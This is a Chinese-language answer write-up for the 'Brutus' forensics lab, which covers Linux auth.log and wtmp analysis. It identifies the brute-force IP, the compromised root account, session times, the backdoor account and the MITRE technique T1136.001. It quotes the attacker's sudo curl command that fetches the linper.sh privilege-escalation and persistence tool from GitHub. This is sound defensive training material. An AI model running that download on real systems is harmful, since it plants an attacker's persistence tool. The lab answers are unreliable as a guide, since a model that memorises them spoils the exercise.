[SL] Brutus Linux登入紀錄分析+MITRE ATTCK+linper.sh本地权限提升工具
QA
| Q | A |
|---|---|
| 1. 攻擊者用來進行暴力破解的 IP 位址是什麼? | 65.2.161.68 |
| 2. 攻擊者成功入侵的帳戶名稱是什麼? | root |
| 3. 攻擊者手動登入並建立終端機會話的 UTC 時間戳是什麼?(wtmp 紀錄中找) | 2024-03-06 06:32:45 |
| 4. 攻擊者這個 SSH 會話的會話編號是多少? | 37 |
| 5. 攻擊者為了持久化,在系統中新增的高權限帳戶名稱是什麼? | cyberjunkie |
| 6. MITRE ATT&CK 中用於「新增帳戶」持久化的子技術 ID 是什麼? | T1136.001 |
| 7. 根據 auth.log,攻擊者第一次 SSH 會話的結束時間是什麼時候? | 2024-03-06 06:37:24 |
| 8. 攻擊者登入後門帳戶後,利用高權限用 sudo 執行的完整指令是什麼? | /usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh |
TASK1
65.2.161.68
TASK2
root
TASK3:Linux 系統登入紀錄 原樣輸出
$ utmpdump wtmp
2024-03-06 06:32:45
TASK4
37
TASK5
cyberjunkie
TASK6:MITRE ATT&CK sub-technique ID
TXXXX → 主技術(Technique).XXX → 子技術(Sub-technique)
示例:
| 編號 | 名稱 | 解釋 |
|---|---|---|
| T1136 | Create Account | 建立帳戶(新增使用者帳戶) |
| T1136.001 | Local Account | 新增「本地帳戶」 |
T1136.001
TASK7:查看 Linux 登入歷史記錄快速查詢
06:18
$ last -F -f wtmp
2024-03-06 06:37:24
TASK8:本地权限提升工具linper.sh
/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh